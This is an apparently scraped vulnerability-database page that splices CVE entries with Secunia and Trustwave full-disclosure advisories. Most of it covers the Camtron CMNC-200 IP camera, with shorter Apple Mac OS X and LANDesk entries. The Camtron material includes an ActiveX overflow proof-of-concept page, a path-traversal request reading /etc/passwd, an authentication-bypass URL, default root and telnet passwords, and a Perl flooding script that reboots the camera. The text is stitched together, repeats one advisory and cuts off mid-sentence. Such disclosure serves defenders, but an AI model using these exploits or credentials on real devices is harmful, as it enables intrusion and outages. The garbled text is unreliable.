Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201011-0103 | CVE-2010-4233 | Camtron CMNC-200 Permissions and Access Control Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The Linux installation on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 has a default password of m for the root account, and a default password of merlin for the mg3500 account, which makes it easier for remote attackers to obtain access via the TELNET interface. The Camtron CMNC-200 is a webcam. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities.
Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device.
The vulnerable products are listed below:
Camtron CMNC-200 Full HD IP Camera running firmware 1.102A-008 is vulnerable.
TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. The most notable features are full HD support
(1920 x 1080), dual streaming, 10x optical zoom, SD card input, input
and output alarm sensor, and integration with different DVR solutions.
Source: http://www.camtron.co.kr
Credit: Wendel G. Henrique of Trustwave's SpiderLabs
CVE: CVE-2010-4230
CVE-2010-4231
CVE-2010-4232
CVE-2010-4233
CVE-2010-4244
Finding 1: Buffer Overflow in ActiveX Control
CVE: CVE-2010-4230
The CMNC-200 IP Camera ActiveX control identified by
CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable
to a stack overflow on the first argument of the connect method.
The vulnerability can be used to set the EIP register,
allowing a reliable exploitation.
The example code below triggers the vulnerability.
<html>
<head><title>IPcam POC</title>
<script>
function Check(){
var bf1 = 'A';
while (bf1.length <= 6144) bf1 = bf1 + 'A';
obj.connect(bf1,"BBBB","CCCC");
}
</script>
</head>
<body onload=" Check();">
<object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32"
id="obj">
</object>
</html></body>
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 2: Directory Traversal in Camera Web Server
CVE: CVE-2010-4231
The CMNC-200 IP Camera has a built-in web server that
is enabled by default. The server is vulnerable to directory
transversal attacks, allowing access to any file on the
camera file system.
The following example will display the contents of
/etc/passwd:
GET /../../../../../../../../../../../../../etc/passwd
HTTP/1.1
Because the web server runs as root, an attacker can read
critical files like /etc/shadow from the web-based
administration interface. Authentication is not required for
exploitation.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 3: Web Based Administration Interface Bypass
CVE: CVE-2010-4232
The CMNC-200 IP Camera has an administrative web
interface that does not handle authentication properly.
Using a properly formatted request, an attacker can bypass
the authentication mechanism.
The first example requires authentication:
http://www.ipcamera.com/system.html
When a second forward slash is placed after the hostname,
authentication is not required.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 4: Undocumented Default Accounts
CVE: CVE-2010-4233
The CMNC-200 IP Camera has undocumented default
accounts on its Linux operating system. These accounts can
be used to login via the cameras telnet interface, which
cannot be normally disabled. The usernames and passwords are
listed below.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 5: Camera Denial of Service
CVE: CVE-2010-4234
The CMNC-200 IP Camera has a built-in web server that
is vulnerable to denial of service attacks. Sending multiple
requests in parallel to the web server may cause the camera
to reboot.
Requests with long cookie header makes the IP camera reboot a few
seconds faster, however the same can be accomplished with requests
of any size.
The example code below is able to reboot the IP cameras in
less than a minute in a local network.
#!/usr/bin/perl
use LWP::UserAgent;
while (1 == 1){
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.6)");
$req = HTTP::Request->new(GET => 'http://192.168.10.100');
$req->header(Accept =>
"text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
$req->header("Keep-Alive" => 0);
$req->header(Connection => "close");
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009
02:06:34 GMT");
$req->header(Cookie =>
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
my $res = $ua->request($req);
}
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Vendor Communication Timeline:
10/7/10 - Vendor contact attempted
10/21/10 - Vendor contact attempted
11/1/10 - Vendor contact attempted
11/11/10 - CVE numbers obtained
11/12/10 - Advisory public release
Revision History:
1.0 Initial publication
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs is the advance security team at Trustwave responsible for
incident response and forensics, ethical hacking and application security
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
security incidents, performed thousands of ethical hacking exercises and
tested the security of hundreds of business applications for Fortune 500
organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201011-0101 | CVE-2010-4231 | Camtron CMNC-200 Full HD IP Camera of Web Directory traversal vulnerability in base management interface |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Directory traversal vulnerability in the web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. The Camtron CMNC-200 is a webcam. The Camtron CMNC-200 built-in WEB server has a directory traversal problem, and an attacker can read system files with ROOT privileges. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities.
Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device.
TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Camtron CMNC-200 Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA42229
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42229/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42229
RELEASE DATE:
2010-11-18
DISCUSS ADVISORY:
http://secunia.com/advisories/42229/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42229/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42229
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Wendel G. Henrique has reported a security issue and some
vulnerabilities in Camtron CMNC-200, which can be exploited by
malicious people to bypass certain security restrictions, disclose
potentially sensitive information, cause a DoS (Denial of Service),
and compromise a vulnerable system.
For more information:
SA42311
The vulnerabilities are reported in version V1.102A-008 / Board ID
66.
PROVIDED AND/OR DISCOVERED BY:
Wendel G. Henrique, Trustwave's SpiderLabs
ORIGINAL ADVISORY:
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. The most notable features are full HD support
(1920 x 1080), dual streaming, 10x optical zoom, SD card input, input
and output alarm sensor, and integration with different DVR solutions.
Source: http://www.camtron.co.kr
Credit: Wendel G. Henrique of Trustwave's SpiderLabs
CVE: CVE-2010-4230
CVE-2010-4231
CVE-2010-4232
CVE-2010-4233
CVE-2010-4244
Finding 1: Buffer Overflow in ActiveX Control
CVE: CVE-2010-4230
The CMNC-200 IP Camera ActiveX control identified by
CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable
to a stack overflow on the first argument of the connect method.
The vulnerability can be used to set the EIP register,
allowing a reliable exploitation.
The example code below triggers the vulnerability.
<html>
<head><title>IPcam POC</title>
<script>
function Check(){
var bf1 = 'A';
while (bf1.length <= 6144) bf1 = bf1 + 'A';
obj.connect(bf1,"BBBB","CCCC");
}
</script>
</head>
<body onload=" Check();">
<object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32"
id="obj">
</object>
</html></body>
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation. The server is vulnerable to directory
transversal attacks, allowing access to any file on the
camera file system. Authentication is not required for
exploitation.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 3: Web Based Administration Interface Bypass
CVE: CVE-2010-4232
The CMNC-200 IP Camera has an administrative web
interface that does not handle authentication properly.
Using a properly formatted request, an attacker can bypass
the authentication mechanism.
The first example requires authentication:
http://www.ipcamera.com/system.html
When a second forward slash is placed after the hostname,
authentication is not required.
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 4: Undocumented Default Accounts
CVE: CVE-2010-4233
The CMNC-200 IP Camera has undocumented default
accounts on its Linux operating system. These accounts can
be used to login via the cameras telnet interface, which
cannot be normally disabled. The usernames and passwords are
listed below.
User: root Password: m
User: mg3500 Password: merlin
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Finding 5: Camera Denial of Service
CVE: CVE-2010-4234
The CMNC-200 IP Camera has a built-in web server that
is vulnerable to denial of service attacks. Sending multiple
requests in parallel to the web server may cause the camera
to reboot.
Requests with long cookie header makes the IP camera reboot a few
seconds faster, however the same can be accomplished with requests
of any size.
The example code below is able to reboot the IP cameras in
less than a minute in a local network.
#!/usr/bin/perl
use LWP::UserAgent;
while (1 == 1){
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.6)");
$req = HTTP::Request->new(GET => 'http://192.168.10.100');
$req->header(Accept =>
"text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
$req->header("Keep-Alive" => 0);
$req->header(Connection => "close");
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009
02:06:34 GMT");
$req->header(Cookie =>
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
my $res = $ua->request($req);
}
Vendor Response:
No response received.
Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Vendor Communication Timeline:
10/7/10 - Vendor contact attempted
10/21/10 - Vendor contact attempted
11/1/10 - Vendor contact attempted
11/11/10 - CVE numbers obtained
11/12/10 - Advisory public release
Revision History:
1.0 Initial publication
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs is the advance security team at Trustwave responsible for
incident response and forensics, ethical hacking and application security
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
security incidents, performed thousands of ethical hacking exercises and
tested the security of hundreds of business applications for Fortune 500
organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201011-0217 | CVE-2010-1842 | Apple Mac OS X of AppKit Vulnerable to buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Buffer overflow in AppKit in Apple Mac OS X 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a bidirectional text string with ellipsis truncation. Apple AppKit is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts will cause denial-of-service conditions.
This issue affects Apple Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4.
NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it. A stack-based buffer overflow vulnerability exists in AppKit in Apple Mac OS X versions 10.6.x prior to 10.6.5
| VAR-201011-0210 | CVE-2010-1833 | Apple Mac OS X of Apple Type Services Vulnerable to arbitrary code execution |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Apple Type Services (ATS) in Apple Mac OS X 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted embedded font in a document.
Successfully exploiting these issues may allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will likely result in a denial-of-service condition.
These issues affect the following:
Mac OS X v10.5.8
Mac OS X Server v10.5.8
Mac OS X v10.6
Mac OS X v10.6.1
Mac OS X v10.6.2
Mac OS X v10.6.3
Mac OS X v10.6.4
Mac OS X Server v10.6
Mac OS X Server v10.6.1
Mac OS X Server v10.6.2
Mac OS X Server v10.6.3
Mac OS X Server v10.6.4
NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it
| VAR-201011-0209 | CVE-2010-1832 | Apple Mac OS X of Apple Type Services Vulnerable to stack-based buffer overflow |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Stack-based buffer overflow in Apple Type Services (ATS) in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code via a crafted embedded font in a document.
An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
This issue affects Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4.
NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it
| VAR-201011-0175 | CVE-2010-2892 | LANDesk Management Gateway of gsb/drivers.php Vulnerable to arbitrary command execution |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
gsb/drivers.php in LANDesk Management Gateway 4.0 through 4.0-1.48 and 4.2 through 4.2-1.8 allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in the DRIVES parameter, as demonstrated by a cross-site request forgery (CSRF) attack. LANDesk Management Gateway is prone to a remote command-execution vulnerability because the appliance fails to adequately sanitize user-supplied input.
Successful exploitation may allow an attacker to execute arbitrary commands and completely compromise the device.
LANDesk Management Gateway 4.0-1.48, 4.2-1.8, 4.0-1.61s and 4.2-1.61 versions are affected. Landesk Management Suite is a network management system that controls desktops, servers, and mobile devices, among others. The vulnerability has been confirmed through a cross-site request forgery attack. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
LANDesk Management Gateway Cross-Site Request Forgery Vulnerability
SECUNIA ADVISORY ID:
SA42188
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42188/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42188
RELEASE DATE:
2010-11-12
DISCUSS ADVISORY:
http://secunia.com/advisories/42188/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42188/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42188
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in LANDesk Management Gateway,
which can be exploited by malicious people to conduct cross-site
request forgery attacks.
The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the
requests. This can be exploited to e.g. inject and execute arbitrary
shell commands if a logged-in administrator visits a specially
crafted web site.
The vulnerability is reported in versions 4.2 GSBWEB v1.61 and 4.0
GSBWEB v1.61s.
SOLUTION:
Apply patch GSBWEB_62.
PROVIDED AND/OR DISCOVERED BY:
Aureliano Calvo, Core Security Technologies
ORIGINAL ADVISORY:
LANDesk:
http://community.landesk.com/support/docs/DOC-21767
Core Security Technologies:
http://www.coresecurity.com/content/landesk-os-command-injection-vulnerability
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201011-0222 | CVE-2010-1847 | Apple Mac OS X Service disruption in some kernels (DoS) Vulnerabilities |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
The kernel in Apple Mac OS X 10.6.x before 10.6.5 does not properly perform memory management associated with terminal devices, which allows local users to cause a denial of service (system crash) via unspecified vectors. Apple Mac OS X is prone to a remote denial-of-service vulnerability.
Local attacker can exploit this issue to shutdown the affected computer, denying service to legitimate users.
NOTE: This issue was previously covered in BID 44778 (Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities), but has been given its own record to better document it.
This issue affects Mac OS X 10.6 to 10.6.4 and Mac OS X Server 10.6 to 10.6.4